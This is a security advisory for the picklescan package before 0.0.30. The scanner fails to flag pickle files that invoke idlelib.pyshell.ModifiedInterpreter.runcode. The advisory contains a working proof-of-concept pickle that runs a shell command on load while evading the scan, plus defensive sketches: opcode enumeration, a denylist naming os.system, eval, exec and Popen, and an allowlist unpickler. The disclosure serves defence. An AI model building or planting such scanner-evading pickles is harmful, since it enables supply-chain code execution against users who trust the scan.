
GSA_kwCzR0hTQS0zZ2Y1LWN4cTktdzIyM84ABLcx

Severity: Moderate

Picklescan is missing detection of calls to the built-in Python function idlelib.pyshell.ModifiedInterpreter.runcode

Affected Package                        Affected Versions   Fixed Versions
pypi:picklescan (pkg:pypi/picklescan)   < 0.0.30            0.0.30

2 dependent packages
82 dependent repositories
55,786 downloads last month

Affected Version Ranges

All affected versions

0.0.1, 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7, 0.0.8, 0.0.9, 0.0.10, 0.0.11, 0.0.12, 0.0.13, 0.0.14, 0.0.15, 0.0.16, 0.0.17, 0.0.18, 0.0.19, 0.0.20, 0.0.21, 0.0.22, 0.0.23, 0.0.24, 0.0.25, 0.0.26, 0.0.27, 0.0.28, 0.0.29

All unaffected versions

0.0.30

Summary

A malicious pickle file can invoke idlelib.pyshell.ModifiedInterpreter.runcode, a function from Python's built-in idlelib library, to execute arbitrary code. Picklescan (before 0.0.30) does not flag this function, so the file passes its scan.

Details

The attack payload executes in the following steps:

First, the attacker crafts the payload by returning the idlelib.pyshell.ModifiedInterpreter.runcode function from the __reduce__ method of a pickled object.
Then the victim checks the pickle file with picklescan, which detects no dangerous functions. Believing the file is safe, the victim calls pickle.load() on it; loading invokes runcode with the attacker's code string, leading to remote code execution.
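The key to the first step is that a pickle file names the callables it will import; a scanner can enumerate them statically by walking the opcode stream with pickletools.genops, without ever loading the file. The sketch below illustrates the idea using builtins.eval as a stand-in payload (chosen so the example needs nothing outside the standard library; the advisory's PoC names idlelib.pyshell.ModifiedInterpreter.runcode instead):

```python
import pickle
import pickletools

class Evil:
    """Stand-in for the PoC: __reduce__ makes loading call eval()."""
    def __reduce__(self):
        return eval, ("1 + 1",)

data = pickle.dumps(Evil(), protocol=4)

# Walk the opcode stream -- nothing is executed. STACK_GLOBAL (protocol 4+)
# pops the module and attribute names pushed as string opcodes just before
# it; the older GLOBAL opcode carries "module name" inline.
strings, imports = [], []
for opcode, arg, _pos in pickletools.genops(data):
    if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
        strings.append(arg)
    elif opcode.name == "STACK_GLOBAL":
        imports.append((strings[-2], strings[-1]))
    elif opcode.name == "GLOBAL":
        imports.append(tuple(arg.split(" ", 1)))

# A scanner then compares each (module, name) pair against its list of
# known-dangerous globals.
print(imports)
```

This is only a sketch of the general technique, not picklescan's actual implementation.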

PoC


import pickle
from idlelib.pyshell import ModifiedInterpreter
from types import SimpleNamespace

class EvilIdlelibPyshellModifiedInterpreterRuncode:
    def __reduce__(self):
        # Command executed on the victim's machine when the pickle is loaded.
        payload = "__import__('os').system('whoami')"
        # runcode is invoked as a plain function, so a SimpleNamespace
        # carrying the attributes it reads stands in for a real
        # interpreter instance.
        fake_self = SimpleNamespace(
            locals={},
            tkconsole=SimpleNamespace(
                executing=False,
                beginexecuting=str,
                canceled=False,
                closing=False,
                showtraceback=str,
                endexecuting=str,
                stderr=None,
                text=SimpleNamespace(),
                getvar=str
            ),
            rpcclt=None,
            debugger=None,
            checklinecache=str,
            active_seq=None,
            showtraceback=str,
            canceled=False,
            closing=False
        )
        return ModifiedInterpreter.runcode, (fake_self, payload)

# Serialize the object; scanning the result with picklescan (< 0.0.30)
# reports nothing, but pickle.load() on it executes the payload.
with open("malicious.pkl", "wb") as f:
    pickle.dump(EvilIdlelibPyshellModifiedInterpreterRuncode(), f)
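Why does the scan pass? Static pickle scanners such as picklescan flag globals by matching each imported (module, name) pair against a list of known-dangerous entries, and idlelib.pyshell.ModifiedInterpreter.runcode was not on that list before 0.0.30. A toy denylist check makes the gap concrete (the pairs below are illustrative, not picklescan's actual list):

```python
# Illustrative denylist; a real scanner's list is longer but, for
# picklescan before 0.0.30, similarly lacked the idlelib entry.
UNSAFE_GLOBALS = {
    ("os", "system"),
    ("builtins", "eval"),
    ("builtins", "exec"),
    ("subprocess", "Popen"),
}

def is_flagged(module: str, name: str) -> bool:
    """Return True if a scanner using this denylist would flag the global."""
    return (module, name) in UNSAFE_GLOBALS

# The PoC's callable is not matched, so the scan passes.
flagged = is_flagged("idlelib.pyshell", "ModifiedInterpreter.runcode")
print(flagged)
```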

Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in a pickle file that remains undetected by the scan but executes when the file is loaded.
Supply chain attack: attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
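A defense that does not depend on a scanner's denylist is the inverse approach described in the Python pickle documentation: an Unpickler subclass whose find_class admits only an explicit allowlist, rejecting everything else, idlelib.pyshell included. A minimal sketch (the allowed pairs are examples; tune them to what your data legitimately needs):

```python
import io
import pickle

# Example allowlist; extend only with globals your data actually requires.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("collections", "OrderedDict"),
}

class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle tries to import; anything
        # not allowlisted is rejected before it can run.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global: {module}.{name}")

def safe_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()

class Evil:
    def __reduce__(self):
        return eval, ("1 + 1",)

# Plain containers need no globals, so they load fine.
benign = safe_loads(pickle.dumps({"weights": [1, 2, 3]}))

# The malicious pickle is rejected instead of executed.
try:
    safe_loads(pickle.dumps(Evil()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```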

Credits

https://github.com/FredericDT
https://github.com/Qhaoduoyu
